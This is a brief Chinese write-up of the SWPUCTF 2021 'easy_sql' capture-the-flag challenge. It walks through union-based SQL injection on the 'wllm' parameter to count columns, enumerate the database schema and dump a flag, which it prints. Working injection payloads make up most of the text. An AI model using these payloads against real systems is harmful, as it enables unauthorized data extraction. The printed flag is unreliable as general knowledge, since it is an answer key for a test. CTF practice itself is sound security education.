SWPUCTF 2021 新生赛 easy_sql

 1.查看源代码.参数为wllm.

2.输入wllm=1及wllm=1‘，可判断为字符型漏洞.

3.通过（？wllm=-1’ order by 3--+）及（？wllm=-1’ order by 4--+），判断字段列数为3列。

4.查看数据库名（?wllm=-1 union select 1,2,database()--+）。

5.查看test_db库表。（?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+）

6.查看字段（?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+）并获取flag-->NSSCTF{147b6384-56f0-4d28-a0fc-2c39608da4ef}

（?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+）。

7.通过。